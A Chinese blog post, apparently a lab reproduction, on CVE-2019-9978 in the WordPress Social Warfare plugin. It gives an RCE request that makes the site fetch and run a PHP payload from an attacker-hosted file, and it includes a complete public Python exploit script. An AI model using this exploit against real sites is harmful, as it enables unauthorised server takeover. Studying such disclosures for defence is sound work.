WordPress social-warfare插件XSS和RCE漏洞【CVE-2019-9978】

最新推荐文章于 2024-07-14 20:19:37 发布
最新推荐文章于 2024-07-14 20:19:37 发布
阅读量554 收藏 7
点赞数 4
文章标签: xss 安全 前端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/XZ_______/article/details/137866033
版权
本文详细描述了WordPress社交平台分享插件social-warfare的一个严重安全漏洞,包括XSS和RCE,影响版本3.5.3及以下。攻击者可通过恶意利用此漏洞在未授权情况下操控网站和服务器。
摘要由CSDN通过智能技术生成

WordPress social-warfare插件XSS和RCE漏洞

~~
漏洞编号 : CVE-2019-9978
影响版本 : WordPress social-warfare < 3.5.3
漏洞描述 : WordPress是一套使用PHP语言开发的博客平台,该平台支持在PHP和MySQL的服务器上架设个人博客网站。social-warfare plugin是使用在其中的一个社交平台分享插件,其3.5.3之前版本存在跨站脚本攻击(XSS)和远程代码执行(RCE)漏洞。远程攻击者可借助这些漏洞,运行任意PHP代码,在无需身份验证的情况下实现对网站和服务器的控制。
攻击成功的条件只需要如下两条:
目标wordpress站点上安装有social-warfare
social-warfare插件的版本小于或等于3.5.2

该漏洞源于Social Warfare组件,并且版本<=3.5.2、且要是管理员登录状态,因此该漏洞是个后台代码执行
漏洞报告https://www.webarxsecurity.com/social-warfare-vulnerability/
利用需一台能够被访问的vps

安装好WordPress后,把social-warfare组件起用(点Activate后,会变成Settings,并在左侧目录下出现Social Warfare子目录)
在这里插入图片描述

*RCE:

http://10.37.129.2:48904/wp-admin/admin-post.php?swp_debug=load_options&swp_url=http://192.168.100.1/1.txt

1.txt 为自己服务器上的文件可编辑执行命令
内容为:

system('cat /sys/devices/platform/serial8250/tty/ttyS2/flags /sys/devices/platform/serial8250/tty/ttyS0/flags')

剪切远程加载的代码逻辑如下,

xxxxx
会去掉
,如果不包含这2个标签会返回false

poc

# Title: RCE in Social Warfare Plugin ( <=3.5.2 )
# Date: March, 2019
# Researcher: Luka Sikic
# Exploit Author: hash3liZer
# Download Link: https://wordpress.org/plugins/social-warfare/
# Version: <= 3.5.2
# CVE: CVE-2019-9978

import sys
import requests
import re
import urlparse
import optparse

class EXPLOIT:

    VULNPATH = "wp-admin/admin-post.php?swp_debug=load_options&swp_url=%s"

    def __init__(self, _t, _p):
        self.target  = _t
        self.payload = _p

    def engage(self):
        uri = urlparse.urljoin( self.target, self.VULNPATH % self.payload )
        r = requests.get( uri )
        if r.status_code == 500:
            print "[*] Received Response From Server!"
            rr  = r.text
            obj = re.search(r"^(.*)<\!DOCTYPE", r.text.replace( "\n", "lnbreak" ))
            if obj:
                resp = obj.groups()[0]
                if resp:
                    print "[<] Received: "
                    print resp.replace( "lnbreak", "\n" )
                else:
                    sys.exit("[<] Nothing Received for the given payload. Seems like the server is not vulnerable!")
            else:
                sys.exit("[<] Nothing Received for the given payload. Seems like the server is not vulnerable!")
        else:
            sys.exit( "[~] Unexpected Status Received!" )

def main():
    parser = optparse.OptionParser(  )

    parser.add_option( '-t', '--target', dest="target", default="", type="string", help="Target Link" )
    parser.add_option( ''  , '--payload-uri', dest="payload", default="", type="string", help="URI where the file payload.txt is located." )

    (options, args) = parser.parse_args()

    print "[>] Sending Payload to System!"
    exploit = EXPLOIT( options.target, options.payload )
    exploit.engage()

if __name__ == "__main__":
    main()

XSS

构造payload

在这里插入图片描述
访问
在这里插入图片描述
管理员在面表盘访问 social-warfare 就会触发xss
在这里插入图片描述

不爱学习的安全小白
关注
  • 4
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
mechanical-warfare:机械战是Mindustry的模组,增加了全新的单位,机甲和炮塔。不适合最弱的引擎。笔记
03-20
机械战是Mindustry的模组,增加了全新的单位,机甲和炮塔。不适合最弱的引擎。 特征: 新物品和液体(与各自的工匠一起使用) 强大的部队,舰艇和机甲分为 新炮塔是防御新敌人的手段 具有新环境磁贴的更具挑战性的...
实战打靶集锦-027-SoSimple1
阿尔泰野狼的博客
03-20 1755
本文简单记录了博主的一次打靶经历,涉及wordpress扫描与爆破、social-warfare远程代码执行漏洞、sudo命令提权等
WordPress Social Warfare插件XSSRCE漏洞分析(CVE-2019-9978
systemino的博客
04-25 2226
一、概述 3月21日,研究人员披露了Social Warfare中存在的两个漏洞,这是WordPress中一个非常受欢迎的插件,可以将社交网络分享按钮添加到网站或博客中。其中,一个是存储型跨站脚本攻击(XSS漏洞,另一个是远程代码执行RCE漏洞,这两个漏洞共同获得CVE-2019-9978编号。在3.5.3版本之前所有版本的Social Warfare中都存在这两个漏洞。3月21日,发布了...
WordPress social-warfare插件XSSRCE漏洞
lonmar的博客
07-19 1044
WordPress social-warfare插件XSSRCE漏洞 漏洞编号 : CVE-2019-9978 影响版本 : WordPress social-warfare < 3.5.3 漏洞描述 : WordPress是一套使用PHP语言开发的博客平台,该平台支持在PHP和MySQL的服务器上架设个人博客网站。social-warfare plugin是使用在其中的一个社交平台分享插件,其3.5.3之前版本存在跨站脚本攻击(XSS)和远程代码执行RCE漏洞。远程攻击者可借助这些漏洞
WordPress插件Social Warfare<=3.5.2 无需登录RCE漏洞
weixin_30672019的博客
04-30 611
  该漏洞只存在于Social Warfare插进的3.5.0、3.5.1和3.5.2版本中,其他版本不存在。   2019年3月21日插件作者紧急发布了3.5.3版本以修复高危的RCE漏洞,在<=3.5.2版本中存在一处无需登录即可getshell的RCE漏洞漏洞分析 在/wp-content/plugins/social-warfare/lib/utilities/SWP_...
[Vulfocus解题系列] 所复现漏洞总结
热门推荐
00勇士王子的博客
07-14 1万+
前言 写[Vulfocus解题系列]也有十天左右了,感觉虽然复现了一些漏洞,但是复现过后对这些漏洞的印象并不深刻,于是就有了写一篇总结篇的想法。把复现过的漏洞介绍、特征什么的总结过来,没事的时候看一看,加深一些印象,别之后别人闻起来某个漏洞,明明复现过,却忘了,那多不好意思。 已复现的Vulfocus靶场漏洞 Struts2-052远程代码执行CVE-2017-9805) 描述: Apache Struts是美国阿帕奇(Apache)软件基金会的一个开源项目,是一套用于创建企业级Java Web应用的开源
[Vulfocus解题系列] WordPress远程命令执行CVE-2016-10033)
00勇士王子的博客
07-07 2276
漏洞介绍 名称: wordpress 远程代码执行CVE-2016-10033) 描述: WordPressWordpress基金会的一套使用PHP语言开发的博客平台。该平台支持在PHP和MySQL的服务器上架设个人博客网站。 WordPress 4.6 远程代码执行漏洞漏洞主要是 PHPMailer 漏洞CVE-2016-10033)在 WordPress Core 代码中的体现,该漏洞不需要任何的验证和插件,在默认的配置情况下就可以利用。远程攻击者可以利用该漏洞执行代码。 影响版本 WordPr
Plants Vs. Zombies Garden Warfare 2-crx插件
04-05
它配备了一些很酷的属性,可以改善您的新标签体验,如: - 具有每个新标签的高品质壁纸 - 当前日期/时间 - 与社交网络和购物网站的快捷方式链接 我们将为您添加更多功能,让您在浏览器上具有更好的体验。...
Blocky Gun 3D Warfare Multiplayer-crx插件
04-06
无论如何,你得到了砍刀和五种类型的武器,所以你有很多选择来结束你贫穷的对手。 如果你对杀害普通士兵感到无聊,不要担心,我们没有忘记,我们有嗜血僵尸模式为你(规则很简单:生存并杀死移动的一切)。 九个新...
Splitgate: Arena Warfare New Tab-crx插件
04-06
在每个新选项卡上均包括竞技场射击游戏Splitgate:Arena Warfare的高清图像。 对于门户网站的粉丝! 在每个新选项卡上均包括竞技场射击游戏Splitgate:Arena Warfare的高清图像。 对于门户网站的粉丝! 请给我们评分...
wordpress运行c语言,WordPress中的某个XSS或导致代码执行
weixin_42382703的博客
05-25 157
使用Gutenberg编辑器的网站(和WordPress 5.0到5.2.2相关联)或因一个XSS漏洞而被攻击者非法接管。根据近期的一项安全分析,WordPress中一个刚刚修复的XSS漏洞可造成代码执行。这个漏洞存在于WordPress内置的编辑器Gutenberg中,主要涉及WordPress 5.0或更高版本。FortiGuard Labs的威胁研究人员Zhouyuan Yang表示,如果文...
wordpress漏洞_漏洞预警|WordPress 5.0.0远程代码执行漏洞
weixin_39778106的博客
12-12 1387
漏洞预警|WordPress 5.0.0远程代码执行漏洞2019-03-17事件来源‍‍‍‍‍近日,RIPS团队在官网公开了一篇WordPress 5.0.0 Remote Code Execution,CVE编号CVE-2019-6977,漏洞是在author权限账号下,可以通过修改Post Meta变量覆盖、目录穿越写文件、文件包含3个漏洞构成一个RCE漏洞漏洞描述此漏洞存在于5....
wordpress 5.0.0 远程代码执行漏洞分析cve-2019-8943
whatday的专栏
08-25 2607
近日,wordpress发布一个安全升级补丁,修复了一个WordPress核心中的远程代码执行漏洞代码修改细节可以参考wordpress团队于Dec 13, 2018提交的代码。据漏洞披露者文中所介绍,这个漏洞WordPress核心中被发现已经超过6年。 https://github.com/WordPress/WordPress/commit/7bd776bdb3f496898bba46959066c2c4aa8723d1#diff-c3d5c535db5622f3b0242411ee5f9.
WordPress5.0.0 远程代码执行
nuaa_llf的博客
03-04 3885
原文链接:https://blog.ripstech.com/2019/wordpress-image-remote-code-execution/ 这篇博文讲述了利用目录穿越和本地文件包含漏洞的“组合拳”在WordPress核心功能实现远程代码执行。过去6年,该WordPress漏洞一直未被揭示。 影响 【POC视频1】 攻击者需要在目标WordPress网站拥有至少作者级权限的账户,然后就...
什么是XSS跨站脚本攻击
m0_70754056的博客
07-11 534
XSS 攻击方式多样,比如反射型 XSS,通过诱导用户点击包含恶意代码的特定链接来触发;存储型 XSS 则是将恶意代码长期存储在网站服务器,使得访问相关页面的用户都可能受到攻击。它指的是攻击者通过利用网站或应用程序对用户输入处理的漏洞,将恶意的脚本代码注入到网页中。当用户访问这些被注入恶意代码的页面时,浏览器会执行这些恶意脚本。也能篡改网页内容,误导用户进行错误操作,或者在用户的设备上执行其他恶意行为。为防范 XSS 攻击,网站开发者需严格审查用户输入,对数据进行恰当处理和转义。
struts2如何防止XSS脚本攻击(XSS防跨站脚本攻击过滤器)
qq_37996327的博客
07-10 352
struts2如何防止XSS脚本攻击(XSS防跨站脚本攻击过滤器)
熊海CMS漏洞练习平台的一次xss、sql注入、越权黑盒思路分析
最新发布
xt350488的博客
07-14 543
建议自定义错误页面,以避免编程语言特性导致的网站根目录泄露问题,从而减少不必要的安全风险。原文:https://mp.weixin.qq.com/s/NkyXg3Dm5ZzFUGpqn0uzBQ。
网络安全筑基篇——XSS、XML、XXE
weixin_55762309的博客
07-10 828
XSS、XXE、XML的区别

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

不爱学习的安全小白

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值